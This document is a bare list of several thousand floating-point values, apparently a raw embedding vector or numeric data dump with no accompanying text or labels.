0.03502431884407997, 0.03211282938718796, -0.014355646446347237, 0.0060139489360153675, -0.001212518778629601, -0.005098704714328051, 0.00554191367700696, -0.013858387246727943, -0.02765912190079689, 0.016906799748539925, -0.00593467615544796, 0.018621983006596565, -0.004893315024673939, -0.0031294876243919134, 0.02686638943850994, -0.011199133470654488, 0.019616499543190002, -0.03980953246355057, 0.004623065702617168, 0.013483641669154167, 0.00013444905926007777, 0.005462640430778265, 0.022254133597016335, -0.013000795617699623, -0.0057473029009997845, 0.0157249104231596, 0.04228862002491951, 0.006633720826357603, 0.029950836673378944, -0.009296578355133533, -0.008770492859184742, -0.04182739555835724, -0.02076956443488598, 0.011746838688850403, -0.03222813829779625, 0.0110117606818676, -0.002587187336757779, 0.018593156710267067, -0.03312176093459129, 0.02937430329620838, -0.0026088072918355465, -0.02040923200547695, 0.006064395885914564, -0.010932487435638905, -0.02468998171389103, -0.012590017169713974, -0.006900366861373186, 0.02151905559003353, -0.0037330444902181625, -0.028192413970828056, 0.01516279112547636, 0.010658634826540947, 0.008229994215071201, 0.031680431216955185, -0.01899672858417034, -0.003988880664110184, 0.025569193065166473, 0.015061898157000542, 0.012525157071650028, -0.019429126754403114, 0.016416747123003006, 0.02089928463101387, 0.01366380788385868, -0.04514245316386223, 0.030585020780563354, -0.00380871444940567, -0.008374126628041267, -0.05739375948905945, -0.016705013811588287, -0.0188525952398777, -0.03663860633969307, -0.02611689828336239, 0.014456539414823055, 0.007876868359744549, 0.01762746460735798, 0.007249889429658651, -0.006810283754020929, -0.004381643142551184, -0.005891436245292425, 0.008943452499806881, -0.0031943474896252155, 0.027774427086114883, -0.04289397969841957, -0.014961004257202148, 0.009923556819558144, -0.01117030717432499, 0.008684013038873672, -0.023320717737078667, 0.01202069129794836, -0.01430519949644804, 0.004839265253394842, -0.005358144175261259, -0.010716288350522518, -0.02940313145518303, 0.009887523017823696, 0.039665400981903076, -0.01589787006378174, -0.01777159795165062, 0.009721769951283932, 0.032804667949676514, -0.007516535464674234, -0.0018737289356067777, -0.0035781015176326036, -0.04655495658516884, -0.005963502451777458, 0.003066429402679205, 0.03312176093459129, -0.021749667823314667, -0.015537536703050137, 0.01383676752448082, 0.0017845466500148177, 0.0013593542389571667, -0.009347024373710155, -0.048486340790987015, -0.0032321824692189693, -0.0028574366588145494, -0.022917145863175392, -0.001071989187039435, 0.010355955921113491, 0.048169247806072235, 0.024646742269396782, -0.001698967651464045, -0.020236272364854813, 0.000863446737639606, -0.01839137077331543, 0.0035636883694678545, -0.00965691078454256, -0.020827217027544975, -0.016777079552412033, 0.022989211603999138, -0.007094946689903736, 0.0050050183199346066, 0.019371474161744118, -0.014254753477871418, -0.003664581337943673, -0.014831284992396832, 0.0042771464213728905, -0.01820399798452854, -0.0471891425549984, -0.01336112804710865, 0.02845185250043869, -0.0074588824063539505, 0.04626668989658356, 0.01115589402616024, -0.021605536341667175, 0.025064727291464806, 0.0392618291079998, -0.012467503547668457, 0.019068794324994087, 0.007732735015451908, -0.029489610344171524, -0.009483951143920422, -0.0026790720876306295, -0.03502431884407997, 0.02182173542678356, 0.013296268880367279, -0.016748253256082535, 0.00840295385569334, -0.02182173542678356, 0.009534397162497044, 0.018621983006596565, 0.004096980206668377, -0.01078114751726389, -0.005869816057384014, 0.02689521573483944, 0.002331351162865758, -0.0361773818731308, 0.008057034574449062, 0.0013233210192993283, -0.02056777849793434, -0.00581216299906373, 0.007037293165922165, 0.00636707479134202, 0.021634362637996674, -0.018420197069644928, 0.011768459342420101, 0.026145724579691887, -0.0314209908246994, -0.02170642837882042, -0.005232027731835842, -0.029114864766597748, -0.008201166987419128, 0.013800733722746372, -0.004197873640805483, -0.009563224390149117, -0.029662569984793663, 0.0028736514504998922, 0.019457954913377762, -0.017958970740437508, -0.0020611018408089876, 0.019284995272755623, 0.0015052889939397573, 0.011833318509161472, -0.015551949851214886, -0.03695569932460785, 0.025540366768836975, -0.0014953798381611705, -0.02343602478504181, -0.041885048151016235, -0.01287828292697668, -0.02249916084110737, -0.015595190227031708, 0.028336547315120697, -0.0024682774674147367, -0.03721513971686363, -0.017108585685491562, 0.03159395232796669, 0.0009855093667283654, -0.018823768943548203, 0.00259259226731956, -0.03113272599875927, 0.003956450615078211, 0.011098240502178669, -0.00935423094779253, 0.023190999403595924, 0.0013125110417604446, 0.0030394045170396566, 0.02545388601720333, 0.028350960463285446, 0.039377134293317795, -0.023536918684840202, -0.019054381176829338, -0.006687771063297987, -0.02404138259589672, 0.005051861517131329, 0.028033867478370667, -0.01178287249058485, 0.011991865001618862, 0.01078114751726389, 0.009390264749526978, 0.01484569814056158, -0.006860730703920126, -0.0014422307722270489, -0.0117972856387496, -0.011991865001618862, 0.0016791493399068713, 0.0052032009698450565, -0.017339199781417847, -0.03234344348311424, 0.028725706040859222, 0.0643409714102745, -0.016402333974838257, 0.0030538178980350494, 0.005725683178752661, -0.009087584912776947, -0.012971969321370125, 0.006698580924421549, -0.003985277377068996, 0.011674772016704082, -0.02153346873819828, 0.018362542614340782, -0.018924662843346596, 0.05171491950750351, -0.013498054817318916, -0.011963038705289364, -0.031075073406100273, -0.0077255284413695335, -0.025814218446612358, -0.0012467503547668457, 0.01052891556173563, -0.0149465911090374, -0.009678530506789684, 0.007696701679378748, -0.000486899254610762, 0.0024286408443003893, -0.021591123193502426, -0.006907573901116848, -0.0037979043554514647, 0.016416747123003006, 0.021288443356752396, 0.01054332870990038, 0.016070827841758728, -0.00557794701308012, -0.014413299039006233, 0.019861526787281036, -0.022383853793144226, -0.0045185694471001625, 0.0032123641576617956, 0.019371474161744118, -0.010802768170833588, -0.002093531657010317, 0.0035024317912757397, -0.018131930381059647, 0.03098859265446663, -0.01823282428085804, 0.002677270444110036, -0.011055000126361847, -0.03447661176323891, 0.0035222501028329134, -0.020856043323874474, -0.01605641469359398, 0.0007391319959424436, -0.0267222560942173, -0.014802458696067333, -0.008748873136937618, 0.007920107804238796, 0.0029601312708109617, 0.09201450645923615, -0.023205412551760674, 0.008042621426284313, -0.015825802460312843, 0.0021367715671658516, -0.0003351092163939029, 0.03095976635813713, 0.022369440644979477, 0.026044832542538643, -0.019270582124590874, 0.020783977583050728, 0.01532133761793375, -0.02404138259589672, 0.022398266941308975, 0.011963038705289364, 0.02937430329620838, -0.02248474769294262, 0.004233906511217356, 0.033698294311761856, 0.009138031862676144, -0.0019548037089407444, 0.015638429671525955, -0.004208683501929045, -0.006158082280308008, 0.027010522782802582, 0.009411884471774101, -0.00965691078454256, -0.046122558414936066, -0.045200105756521225, -0.009483951143920422, 0.0008346200920641422, -0.014636705629527569, -0.008042621426284313, -0.020481297746300697, 0.004053740296512842, 0.012899902649223804, 0.02925899811089039, 0.020077725872397423, -0.006006742361932993, -0.033092934638261795, -0.015768149867653847, -0.024026969447731972, -0.021735254675149918, 0.004749182146042585, -0.015133963897824287, 0.009455123916268349, 0.0006139164906926453, 0.004745578859001398, -0.021418163552880287, 0.006284198723733425, -0.010478468611836433, -0.02781766839325428, 0.025684500113129616, -0.0002747535181697458, -0.007185029797255993, 0.0035258533898741007, -0.041077904403209686, -0.00794172752648592, 0.010903661139309406, -0.004569015931338072, -0.0010377574944868684, 0.008503846824169159, -0.02419992908835411, -0.0064067114144563675, -0.012402644380927086, 0.0018376957159489393, -0.029806703329086304, -0.001291791908442974, -0.008561499416828156, 0.015523123554885387, 0.020625431090593338, -0.005931072868406773, -0.005523896776139736, -0.0011476589133962989, -0.015263684093952179, -0.01162432599812746, 0.00570406299084425, 0.008388539776206017, -0.03191104531288147, -0.03211282938718796, 0.012575604021549225, 0.013735874556005001, -0.012921523302793503, 0.011444159783422947, 0.0013593542389571667, 0.04338403046131134, -0.028394199907779694, -0.0038231275975704193, 0.005758113227784634, -0.011047793552279472, 0.010802768170833588, -0.00013152135943528265, 0.020178619772195816, 0.006320231594145298, 0.0042303032241761684, 0.023363959044218063, 0.02388283610343933, -0.0005332920700311661, -0.01195583213120699, -0.02186497487127781, 0.020466884598135948, 0.011941418051719666, -0.007415642496198416, 0.003967260476201773, -0.04303811118006706, 0.0069147804751992226, 0.004453709349036217, -0.004107790533453226, -0.009692943654954433, 0.0014107016613706946, -0.002367384498938918, -0.011754045262932777, 0.01777159795165062, 0.0004420829063747078, -0.010190202854573727, 0.024257583543658257, -0.000744086573831737, -0.0007823719060979784, 0.0021601931657642126, -0.03415951877832413, -0.029431957751512527, 0.014989831484854221, 0.005956295877695084, -0.04179856926202774, 0.018809355795383453, 0.006190511863678694, 0.029518436640501022, -0.02591511234641075, 0.012726943008601665, -0.004046533722430468, 0.004017706960439682, 0.010759527795016766, 0.025511540472507477, -0.006983243394643068, 0.001788149937056005, -0.00375466444529593, 0.023479264229536057, -0.0011395515175536275, -0.001020641764625907, 0.00817234069108963, -0.016935626044869423, 0.030296755954623222, -0.018261650577187538, 0.01935706101357937, 0.00522121787071228, -0.0025493523571640253, -0.00949836429208517, -0.0057473029009997845, 0.010795561596751213, 0.0015989753883332014, 0.0235657449811697, -0.031824566423892975, 0.011336060240864754, 0.0041726501658558846, 0.018160756677389145, -0.02437288872897625, 0.004385246429592371, -0.011761251837015152, -0.007401229348033667, 0.017382439225912094, -0.009664117358624935, 0.006341851782053709, 0.006338248495012522, -0.006316628307104111, 0.0063814884051680565, 0.0251367948949337, -0.018953489139676094, -0.00738681573420763, -0.017512159422039986, 0.0019674154464155436, 0.016315855085849762, -0.0008359713829122484, 0.0068210940808057785, -0.014478159137070179, 0.01336112804710865, 0.004684322513639927, 0.0061616855673491955, 0.003641159739345312, 0.024315236136317253, -0.000765256118029356, -0.003118677530437708, -0.014370059594511986, 0.029950836673378944, 0.004291560035198927, -0.0035781015176326036, -0.010161375626921654, -0.006122048944234848, 0.00679587060585618, -0.04606490582227707, 0.030902113765478134, 0.006222941912710667, 0.019760632887482643, -0.007357989437878132, -0.009628083556890488, 0.0038303344044834375, -0.032804667949676514, 0.009462331421673298, -0.020077725872397423, 0.007004863582551479, 0.008936245925724506, -0.011249580420553684, -0.03586028888821602, 0.002704295329749584, 0.0070192767307162285, -0.0038591609336435795, -0.03681156784296036, -0.01854991540312767, 0.019112035632133484, -0.015638429671525955, -0.020510124042630196, 0.010103723034262657, -0.013144928961992264, -0.010291095823049545, -0.0032664139289408922, 0.055721815675497055, 0.019775046035647392, -0.018189582973718643, -0.026520470157265663, -0.016070827841758728, 0.0036501679569482803, 0.00196561380289495, -0.009707356803119183, -0.012683703564107418, 0.01617172174155712, -0.009707356803119183, 0.0036393580958247185, 0.013144928961992264, -0.002331351162865758, 0.019616499543190002, -0.005581550300121307, -0.029662569984793663, -0.013245821930468082, -0.011350473389029503, 0.007891281507909298, -0.007325559388846159, -0.0329776294529438, -0.007624635472893715, 0.0027673535514622927, -0.011055000126361847, 0.025223273783922195, 0.021000176668167114, 0.010903661139309406, -0.018492262810468674, -0.010046069510281086, -0.017497746273875237, -0.00022441957844421268, 0.010651428252458572, 0.021965868771076202, -0.006976036820560694, 0.030239101499319077, -0.014261960051953793, 0.030267927795648575, -0.0032898355275392532, -0.017656290903687477, -0.007185029797255993, -0.0005202300380915403, -0.001426916685886681, -0.02530975453555584, -0.016272615641355515, -0.020034486427903175, 0.06485984474420547, -0.018521089106798172, -0.007984967902302742, 0.025021487846970558, -0.015796976163983345, 0.021749667823314667, -0.021792909130454063, -0.007138186600059271, 0.02249916084110737, 0.011429746635258198, -0.006385091692209244, -0.006698580924421549, 0.010305508971214294, -0.0034429768566042185, -0.009714563377201557, -0.003801507642492652, -0.00920289196074009, -0.015350163914263248, -0.01273414958268404, 0.009390264749526978, -0.010629808530211449, 0.034361306577920914, 0.016892386600375175, -0.02858157269656658, 0.00059454859001562, -0.017238305881619453, -0.023637810721993446, 0.005678839981555939, -0.007001260295510292, -0.003125884337350726, -0.007523742038756609, -0.023450437933206558, 0.0028916681185364723, -0.021576708182692528, 0.028423026204109192, 0.014103413559496403, 0.002686278661713004, 0.03015262261033058, 0.007884074933826923, -0.010060482658445835, 0.0008224588818848133, 0.0012386429589241743, 0.013570121489465237, -0.013649394735693932, 0.015667255967855453, -0.0006724704871885478, -0.029100451618433, 0.0017440092051401734, 0.019112035632133484, 0.007001260295510292, -0.003884384175762534, 0.017094172537326813, -0.030613847076892853, 0.004540189169347286, 0.017814837396144867, -0.018304890021681786, -0.027788840234279633, 0.006320231594145298, -0.0306426752358675, 0.0049833981320261955, -0.00420147692784667, -0.01390883419662714, -0.021129896864295006, -0.006504001095890999, -0.014110620133578777, 0.0259295254945755, -0.00879931915551424, -0.007329162675887346, -0.009873109869658947, -0.02170642837882042, 0.013180961832404137, 0.012287337332963943, 0.023046866059303284, 0.00482845539227128, -0.007466088980436325, 0.016604119911789894, 0.016287028789520264, -0.00911641214042902, 0.004702338948845863, 0.014456539414823055, -0.03756105899810791, 0.031219206750392914, -0.00738681573420763, -0.021605536341667175, 0.01634468138217926, 0.00817234069108963, 0.01280621625483036, 0.0017350008711218834, -0.01320978906005621, -0.03917534649372101, -0.0314209908246994, -0.0065544480457901955, -0.022412680089473724, -0.014917764812707901, 0.009296578355133533, 0.015436643734574318, 0.01460787933319807, 0.012316164560616016, 0.029633743688464165, -0.026001591235399246, -0.0076102218590676785, -0.010824387893080711, -0.02484852820634842, 0.00881373230367899, 0.02075515128672123, -0.02405579574406147, 0.00004856043233303353, 0.00339793530292809, 0.016459988430142403, 0.010716288350522518, 0.0033438855316489935, -0.006248165387660265, 0.012301751412451267, -0.008511053398251534, -0.002533137332648039, -0.010817181318998337, 0.023147758096456528, -0.035744983702898026, -0.011271200142800808, 0.030296755954623222, -0.003981674090027809, 0.01028388924896717, -0.0002513319195713848, -0.010745114646852016, -0.0021601931657642126, 0.006039172410964966, -0.009347024373710155, -0.015033070929348469, -0.002167399972677231, -0.010889247991144657, 0.013462021946907043, 0.0306426752358675, 0.029835529625415802, 0.011076620779931545, -0.011184720322489738, -0.02088487148284912, -0.004349213093519211, 0.022254133597016335, -0.03283349424600601, -0.00012758022057823837, 0.0019295804668217897, -0.01493217796087265, -0.03081563487648964, 0.0180598646402359, 0.011141479946672916, -0.006377885118126869, -0.016258202493190765, -0.021634362637996674, 0.020798390731215477, -0.00958484411239624, -0.010010036639869213, -0.008734459057450294, -0.004381643142551184, -0.013562914915382862, -0.030873287469148636, 0.010363162495195866, 0.008179547265172005, 0.03675391152501106, 0.016733840107917786, -0.015580776147544384, 0.0035276550333946943, -0.0006445447215810418, -0.02764470875263214, -0.030383234843611717, -0.024099037051200867, -0.006493191234767437, -0.0013917841715738177, 0.0014206108171492815, -0.01680590771138668, 0.0015899670543149114, -0.015796976163983345, -0.003898797556757927, -0.010435229167342186, 0.007329162675887346, 0.026808736845850945, 0.011451366357505322, -0.012330577708780766, -0.014917764812707901, -0.017036519944667816, 0.013555708341300488, 0.011754045262932777, 0.013144928961992264, 0.0033078521955758333, -0.016258202493190765, 0.00659768795594573, -0.003345687175169587, -0.008532673120498657, -0.009577637538313866, -0.00864077266305685, -0.00499060470610857, 0.009368645027279854, 0.006248165387660265, 0.012229684740304947, 0.027471749112010002, 0.00048464720021001995, 0.01696445420384407, 0.00495096854865551, -0.004702338948845863, -0.0017404059180989861, 0.0018133731791749597, 0.008157927542924881, -0.008943452499806881, -0.005513086915016174, -0.005354540888220072, 0.001446734881028533, 0.00118008884601295, -0.0034952249843627214, 0.0003013280511368066, -0.018304890021681786, -0.0034970268607139587, 0.009721769951283932, -0.0117972856387496, 0.009065965190529823, -0.0005278870812617242, 0.015061898157000542, -0.011062207631766796, -0.02358015812933445, -0.012135998345911503, 0.010060482658445835, 0.016315855085849762, 0.0016413144767284393, 0.01264766976237297, 0.008748873136937618, -0.005621186923235655, -0.00910199899226427, 0.0070192767307162285, -0.009419091045856476, -0.011999071575701237, 0.010982934385538101, -0.023666637018322945, -0.005235631018877029, -0.010377575643360615, -0.0007449873955920339, 0.015955522656440735, 0.010932487435638905, 0.005379763897508383, 0.01493217796087265, 0.025958351790905, 0.009865903295576572, -0.009930763393640518, -0.005621186923235655, -0.01006768923252821, -0.0011674772249534726, 0.001994440332055092, 0.004994207993149757, -0.0011134273372590542, -0.008381333202123642, -0.0021547882352024317, 0.015436643734574318, -0.014132239855825901, 0.004796025343239307, -0.008438986726105213, -0.012590017169713974, -0.006680564023554325, -0.03222813829779625, 0.006514811422675848, 0.012611636891961098, -0.010572155006229877, -0.0235657449811697, -0.002779965056106448, 0.0033294721506536007, 0.006651737727224827, 0.005916659254580736, -0.027269963175058365, -0.010420815087854862, 0.008734459057450294, 0.011040586978197098, 0.0014818673953413963, 0.013015209697186947, -0.04006897285580635, 0.009959589689970016, 0.023190999403595924, -0.003851954359561205, 0.002462872536852956, -0.00008079329563770443, -0.009959589689970016, 0.018175169825553894, -0.007588602136820555, 0.0010647824965417385, -0.008907418698072433, -0.004961778409779072, -0.011235167272388935, -0.0235945712774992, 0.017339199781417847, 0.008669599890708923, -0.005808559712022543, 0.006835507228970528, -0.020380405709147453, -0.004273543134331703, 0.01507631130516529, 0.015624016523361206, -0.007185029797255993, -0.011336060240864754, -0.004806835204362869, -0.007253492716699839, 0.007138186600059271, -0.010046069510281086, -0.004648289177566767, 0.006446348037570715, -0.0018611173145473003, 0.0010638816747814417, 0.0227874256670475, 0.01715182699263096, 0.017396852374076843, 0.021144310012459755, 0.006958020385354757, 0.007415642496198416, -0.0037222346290946007, 0.0005094200605526567, -0.012417057529091835, 0.0054230038076639175, 0.005286077503114939, -0.01507631130516529, 0.00801379419863224, -0.001489073969423771, 0.014658325351774693, 0.027399681508541107, -0.022455919533967972, -0.0037006146740168333, -0.007891281507909298, 0.02075515128672123, 0.0023745910730212927, -0.0013233210192993283, -0.022542400285601616, -0.020697498694062233, -0.004803231917321682, 0.008157927542924881, -0.009880316443741322, -0.014009727165102959, -0.009606463834643364, -0.010391988791525364, -0.013548501767218113, -0.02925899811089039, 0.028653638437390327, -0.0068210940808057785, -0.003909607417881489, -0.021807322278618813, -0.0008684012573212385, 0.00008405881089856848, 0.009728977456688881, 0.013404368422925472, 0.021965868771076202, -0.005646409932523966, -0.00949836429208517, -0.0037222346290946007, -0.00824440736323595, 0.010204616002738476, -0.014586258679628372, 0.02370987832546234, -0.01327464822679758, 0.005134738050401211, 0.0069724335335195065, -0.0008607442141510546, 0.00663732411339879, -0.017641877755522728, -0.00808586087077856, -0.014593465253710747, -0.00514915119856596, -0.009700150229036808, -0.01617172174155712, 0.005765319801867008, -0.031219206750392914, 0.001109824050217867, -0.003224975662305951, 0.015638429671525955, -0.02061101794242859, -0.01078114751726389, -0.013188169337809086, -0.01500424463301897, 0.029806703329086304, 0.0043708328157663345, 0.0012701719533652067, -0.004374436568468809, -0.002223251387476921, -0.0023349544499069452, 0.023637810721993446, 0.0024232359137386084, 0.002041283529251814, -0.0188814215362072, -0.02156229503452778, -0.021749667823314667, -0.021432576701045036, -0.03170925751328468, -0.028567159548401833, -0.01484569814056158, 0.012474710121750832, 0.01980387419462204, -0.00047023387742228806, 0.011235167272388935, 0.03848350793123245, -0.01978945918381214, 0.015652842819690704, -0.01501865778118372, 0.013562914915382862, -0.011191926896572113, 0.004248320125043392, -0.003500630147755146, -0.002466475823894143, 0.021648775786161423, 0.01758422516286373, 0.002313334494829178, 0.020481297746300697, -0.0061869085766375065, 0.0110117606818676, -0.0025403439067304134, 0.0017106784507632256, -0.008359713479876518, 0.010399195365607738, 0.00379069778136909, 0.024099037051200867, 0.002952924696728587, -0.012532363645732403, -0.012856663204729557, -0.0015566362999379635, -0.01484569814056158, -0.018290476873517036, 0.0008075952064245939, 0.018031038343906403, 0.001839497359469533, 0.01588345505297184, -0.01091086771339178, 0.010471262037754059, -0.020221859216690063, 0.00120711384806782, -0.008921831846237183, 0.008208373561501503, 0.003024991136044264, -0.012525157071650028, -0.001399891683831811, -0.020207446068525314, 0.003758267732337117, 0.009880316443741322, 0.0243584755808115, 0.0010278484551236033, -0.004280749708414078, -0.04987001419067383, -0.01870846189558506, 0.007826421409845352, -0.01886700838804245, 0.01682032085955143, 0.03271818906068802, -0.007076929789036512, -0.003169124247506261, -0.011876558884978294, -0.0050050183199346066, 0.013238615356385708, 0.015537536703050137, 0.031824566423892975, 0.00636707479134202, 0.0013629576424136758, 0.006705787498503923, -0.005570739973336458, 0.012121585197746754, 0.018679635599255562, -0.012510743923485279, 0.015350163914263248, -0.0005814865580759943, -0.007999381050467491, 0.021403750404715538, 0.018766116350889206, -0.012662083841860294, 0.011055000126361847, -0.015926696360111237, -0.02686638943850994, 0.0076318420469760895, 0.03329472243785858, 0.021403750404715538, -0.007130980025976896, -0.031997524201869965, -0.0024916990660130978, -0.005902246106415987, 0.010435229167342186, 0.023046866059303284, -0.01810310408473015, -0.000021507345081772655, -0.018953489139676094, 0.02657812461256981, -0.019717393442988396, -0.01130723301321268, -0.021937042474746704, 0.02608807198703289, -0.0006958920857869089, -0.010629808530211449, -0.004237509798258543, -0.008806525729596615, 0.009310991503298283, -0.018290476873517036, -0.0051095145754516125, -0.0024052192457020283, -0.0008404754917137325, -0.015984348952770233, 0.017958970740437508, -0.010240648873150349, -0.01840578392148018, 0.018362542614340782, -0.006622910965234041, -0.012308957986533642, 0.010233442299067974, 0.0050302413292229176, 0.0009260544902645051, 0.03352533280849457, 0.019775046035647392, -0.014117826707661152, 0.024012556299567223, 0.016243787482380867, 0.02925899811089039, -0.0011224356712773442, 0.017195066437125206, -0.025540366768836975, -0.010197409428656101, -0.008705632761120796, 0.007595808710902929, 0.02624661847949028, 0.0027223119977861643, 0.027529401704669, 0.009541603736579418, -0.0011458572698757052, -0.005372557323426008, 0.0015052889939397573, -0.023969316855072975, 0.007603015284985304, 0.0015557354781776667, -0.013224202208220959, -0.012640463188290596, 0.038915909826755524, -0.014269166626036167, -0.0019079605117440224, -0.0059202625416219234, -0.0030592228285968304, -0.017094172537326813, 0.007876868359744549, -0.013389955274760723, 0.0090443454682827, -0.009015519171953201, -0.019717393442988396, 0.001451239106245339, 0.0141610661521554, 0.0056428066454827785, -0.0008391242590732872, -0.008057034574449062, -0.009476744569838047, -0.02610248513519764, -0.032631710171699524, -0.006244562100619078, 0.016142895445227623, 0.02313334494829178, 0.023479264229536057, 0.006049982272088528, -0.012244097888469696, -0.0038879874628037214, -0.012669290415942669, 0.005343730561435223, -0.01919851452112198, 0.015061898157000542, 0.0028105934616178274, 0.009772216901183128, 0.008705632761120796, 0.002990759676322341, 0.030296755954623222, 0.0014368257252499461, 0.007361592724919319, -0.01712299883365631, -0.0007017474854364991, 0.0076318420469760895, 0.0014404291287064552, -0.024257583543658257, -0.023969316855072975, -0.0066012912429869175, 0.011725218966603279, -0.006936400197446346, -0.011494605801999569, 0.00613285880535841, 0.002650245325639844, -0.017050933092832565, -0.026693429797887802, -0.02029392495751381, -0.025381820276379585, -0.008121893741190434, 0.0009855093667283654, 0.0022538797929883003, -0.008302059955894947, -0.010629808530211449, -0.000818855594843626, -0.009995623491704464, -0.007094946689903736, -0.03551436960697174, -0.0011305431835353374, -0.010658634826540947, -0.0006981441983953118, -0.01076673436909914, 0.023190999403595924, -0.017166240140795708, -0.007812008261680603, -0.003210562514141202, 0.009728977456688881, -0.00801379419863224, 0.014961004257202148, -0.012784596532583237, -0.038281723856925964, -0.010175789706408978, 0.006950813811272383, 0.009527190588414669, 0.008842559531331062, -0.01106941420584917, -0.008201166987419128, -0.0005184283363632858, 0.006745424121618271, -0.0043924530036747456, -0.018578743562102318, 0.001956605352461338, 0.015652842819690704, -0.004576222505420446, -0.01423313282430172, 0.02280183881521225, 0.008129101246595383, -0.0018647206015884876, -0.012676496990025043, -0.01414665300399065, -0.029446370899677277, 0.002583583816885948, 0.027702361345291138, -0.0037294412031769753, -0.026794323697686195, 0.010723494924604893, -0.007711115293204784, -0.009519984014332294, 0.0065076048485934734, -0.0024790875613689423, 0.0031673226039856672, -0.022441506385803223, 0.002527732402086258, 0.000004525269105215557, -0.02529533952474594, 0.005772526375949383, 0.04122203588485718, -0.014564638957381248, 0.021605536341667175, -0.0018575139110907912, 0.004046533722430468, 0.002706096973270178, -0.015595190227031708, 0.008366920053958893, 0.016849147155880928, 0.007689495105296373, -0.0003711424651555717, 0.009231718257069588, -0.01038478221744299, -0.015105137601494789, 0.016315855085849762, -0.014629499055445194, -0.004594238940626383, 0.013296268880367279, -0.0009756002109497786, 0.00848943367600441, -0.006529224570840597, 0.0032141658011823893, -0.02264329232275486, -0.025511540472507477, -0.003590713255107403, 0.008359713479876518, 0.009844283573329449, 0.0046915290877223015, -0.008057034574449062, -0.0005702261696569622, 0.007084136828780174, -0.016906799748539925, 0.028841011226177216, 0.014571845531463623, -0.030844461172819138, 0.0030267927795648575, 0.03046971559524536, 0.0014161067083477974, 0.02405579574406147, 0.02594393864274025, -0.02937430329620838, 0.020538952201604843, -0.00023083799169398844, -0.015393403358757496, -0.0013593542389571667, -0.024271996691823006, -0.005891436245292425, 0.0015584379434585571, 0.000288941606413573, -0.01132885366678238, -0.013490848243236542, -0.03110389970242977, -0.013101689517498016, -0.0018989521777257323, 0.018117517232894897, 0.014456539414823055, -0.008590326644480228, 0.0031384958419948816, -0.027154656127095222, -0.006806680466979742, -0.026779910549521446, -0.0021421764977276325, -0.012539570219814777, 0.0157249104231596, 0.020365992560982704, -0.023522503674030304, -0.013570121489465237, 0.017641877755522728, -0.00742284907028079, 0.015566362999379635, 0.01699328050017357, 0.014096206985414028, -0.04704500734806061, 0.00011834670294774696, -0.005275267641991377, 0.01273414958268404, 0.017036519944667816, -0.00856870599091053, -0.0010197409428656101, -0.014543019235134125, 0.016575293615460396, 0.007321956101804972, 0.003098859451711178, -0.014420505613088608, -0.008179547265172005, 0.007401229348033667, -0.00794893503189087, 0.0022088380064815283, 0.006049982272088528, 0.0072859227657318115, -0.00761742889881134, -0.0005490566254593432, 0.0011017165379598737, 0.0073327659629285336, 0.02545388601720333, -0.009527190588414669, -0.020856043323874474, -0.007339972537010908, 0.014016933739185333, -0.019746219739317894, 0.005718476604670286, -0.012604430317878723, 0.0330064557492733, 0.006745424121618271, -0.006219338625669479, -0.021648775786161423, 0.008352506905794144, -0.00824440736323595, -0.003417753614485264, 0.009123618714511395, 0.010074895806610584, -0.01634468138217926, 0.01249633077532053, 0.009476744569838047, -0.000931459479033947, -0.0029979662504047155, 0.014586258679628372, 0.016287028789520264, -0.012172031216323376, -0.0014485366409644485, 0.011999071575701237, -0.008965072222054005, -0.005311300978064537, 0.026160137727856636, -0.0036069280467927456, 0.010593774728477001, -0.017079759389162064, 0.0016413144767284393, 0.011112653650343418, -0.013044035993516445, -0.024099037051200867, -0.014643912203609943, -0.015278097242116928, -0.039982493966817856, 0.02451702207326889, 0.003061024472117424, 0.011112653650343418, -0.001684554386883974, -0.009411884471774101, 0.014802458696067333, 0.010709081776440144, 0.027558228000998497, 0.00010460902558406815, 0.008467813022434711, 0.002214243169873953, 0.008539879694581032, 0.003370910417288542, -0.014615085907280445, -0.040472544729709625, 0.0377051904797554, -0.005592360161244869, -0.0037006146740168333, -0.00833088718354702, -0.005451830569654703, 0.0008684012573212385, 0.012971969321370125, 0.0003465948102530092, -0.0141610661521554, -0.02954726293683052, -0.01947236806154251, 0.004259129986166954, 0.006813887041062117, -0.0010963116073980927, 0.00566442683339119, 0.021461402997374535, 0.014312406070530415, -0.016690600663423538, -0.015508710406720638, 0.0157249104231596, -0.008294853381812572, 0.017396852374076843, 0.0004274444072507322, -0.019775046035647392, 0.00584819633513689, -0.00959925726056099, 0.009253337979316711, 0.0010927082039415836, 0.017540985718369484, -0.018780529499053955, -0.006442744750529528, 0.0004369031230453402, -0.016272615641355515, -0.014370059594511986, -0.0173103716224432, 0.006698580924421549, -0.015652842819690704, -0.02751498855650425, -0.010082103312015533, 0.02170642837882042, 0.02310451865196228, 0.018737290054559708, -0.01092528086155653, -0.005195994395762682, 0.008410160429775715, 0.012784596532583237, 0.012633256614208221, -0.009318198077380657, 0.003689804580062628, -0.020034486427903175, 0.0004384795902296901, -0.009620876982808113, -0.01423313282430172, 0.014038553461432457, -0.007376005873084068, 0.009058758616447449, -0.02391166426241398, -0.01589787006378174, 0.0007098549976944923, 0.003154710866510868, 0.03035440854728222, -0.008294853381812572, 0.0018133731791749597, -0.018621983006596565, 0.005318507552146912, 0.007754355203360319, 0.006763440556824207, -0.0007814710843376815, -0.0012206262908875942, -0.010954107157886028, -0.0029709413647651672, -0.025886286050081253, -0.002264689654111862, -0.0020430851727724075, -0.012762976810336113, -0.019112035632133484, -0.01919851452112198, -0.0003247496497351676, -0.031824566423892975, 0.01429078634828329, -0.019256167113780975, -0.0038159210234880447, -0.012143204919993877, 0.007891281507909298, 0.0046446858905255795, 0.008352506905794144, -0.01726713217794895, -0.004965381696820259, -0.03712866082787514, -0.024430543184280396, 0.013202582485973835, 0.004259129986166954, -0.007466088980436325, -0.0010233442299067974, -0.01793014444410801, 0.009779423475265503, 0.020092139020562172, 0.0018791338661685586, 0.0053977807983756065, -0.006734614260494709, -0.007588602136820555, -0.02329189144074917, 0.01935706101357937, -0.018593156710267067, -0.008251613937318325, 0.021115483716130257, 0.010449642315506935, -0.02878335863351822, 0.009022725746035576, -0.008179547265172005, 0.0014494374627247453, 0.009808249771595001, 0.00355828320607543, 0.010723494924604893, 0.03046971559524536, 0.025843046605587006, 0.005055464804172516, 0.008395747281610966, -0.0024502607993781567, 0.0015233055455610156, 0.00037699786480516195, -0.009786630049347878, 0.007170616649091244, 0.012525157071650028, 0.01336112804710865, -0.018578743562102318, -0.0000154689605551539, 0.007538155652582645, -0.009541603736579418, 0.013159342110157013, 0.009685737080872059, 0.0008048926829360425, 0.00758139556273818, 0.004547395743429661, -0.004745578859001398, 0.002680873731151223, 